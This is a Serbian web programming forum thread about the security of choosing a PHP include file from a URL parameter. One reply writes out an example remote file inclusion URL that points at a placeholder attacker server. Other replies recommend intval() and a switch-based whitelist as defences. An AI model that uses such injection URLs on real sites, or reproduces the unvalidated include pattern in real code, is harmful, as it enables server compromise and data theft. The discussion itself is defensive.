Pitanje href

Pitanje href

offline
  • igor86  Male
  • Stručni saradnik
    Web programiranje
  • Pridružio: 24 Maj 2006
  • Poruke: 1633

Interesuje me koliko je pogubno koristiti npr.

<a href="index.php?navigacija=nekibroj">
,a u php-u da vam ovaj link referise na nekibroj.php, odnosno include "nekibroj.php"; (nadam se da ste razumjeli)

Šta mislite o ovome i da li je neko imao bilo kakvih iskustava sa probijanjem sigurnosti svoje skripte.



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
offline
  • Peca  Male
  • Glavni Administrator
  • Predrag Damnjanović
  • SysAdmin i programer
  • Pridružio: 17 Apr 2003
  • Poruke: 23211
  • Gde živiš: Niš

pre include() OBAVEZNO uradi
$nekibroj=intval($nekibroj);

i neki if (fileexist(...



offline
  • igor86  Male
  • Stručni saradnik
    Web programiranje
  • Pridružio: 24 Maj 2006
  • Poruke: 1633

Ok, znači što se tiče sigurnosti ovo je uredu. Pravim neki veći projekat, pa da u samom startu ne zeznem.

offline
  • Blood  Male
  • Ugledni građanin
  • Pridružio: 26 Jul 2003
  • Poruke: 384
  • Gde živiš: Beograd

nije to u redu sto se tice sigurnosti, sta ako neko napise:
index.php?navigacija=http://putanja_do_njegovog_servera/fajl_koji_cita_sve_podatke_sa_tvog_servera.php

sta ces onda??

offline
  • igor86  Male
  • Stručni saradnik
    Web programiranje
  • Pridružio: 24 Maj 2006
  • Poruke: 1633

O tome slucaju bi otvorio default page-naslovnu. Koliko se uistinu povećava sigurnost upotrebom .htaccess-a?

offline
  • Pridružio: 01 Mar 2005
  • Poruke: 549
  • Gde živiš: Apatin

$stranica = $_GET["stranica"];     switch ( $stranica  ) {     case "" :     case "pocetna":     include("putanja/pocetna.php");     break;     case "test":     include("putanja/test.php");     break;     default :     include("putanja/pocetna.php");     break; }
<a href="index.php?stranica=pocetna">Početna</a> <a href="index.php?stranica=test">Test</a>
Po meni je najsigurnije ovako...nema laži nema prevare Very Happy

Ukoliko neko ukuca neku drugu putanju otvorice default ili u ovome slučaju "putanja/pocetna.php"

offline
  • Peca  Male
  • Glavni Administrator
  • Predrag Damnjanović
  • SysAdmin i programer
  • Pridružio: 17 Apr 2003
  • Poruke: 23211
  • Gde živiš: Niš

Blood ::nije to u redu sto se tice sigurnosti, sta ako neko napise:
index.php?navigacija=http://putanja_do_njegovog_servera/fajl_koji_cita_sve_podatke_sa_tvog_servera.php

sta ces onda??


zato sam rekao da obavezno uradi intval(), pa moze da se kuca do mile volje tekst, intval() ce ga pretvoriti u 0.

inace, losa zamisao Igore, ovo sto je Stenley predlozio je bolja, i standardna, varijanta.

Ko je trenutno na forumu
 

Ukupno su 1123 korisnika na forumu :: 25 registrovanih, 4 sakrivenih i 1094 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: BlekMen, bokisha253, draganl, Frunze, Gargantua, Georgius, HogarStrashni, Kibice, Kubovac, LUDI, Mercury, Milan A. Nikolic, milenko crazy north, Milometer, milutin134, MiroslavD, moldway, Nikola00, Sir Budimir, Snorks, vathra, VP6919, vrag81, wizzardone, zastavnik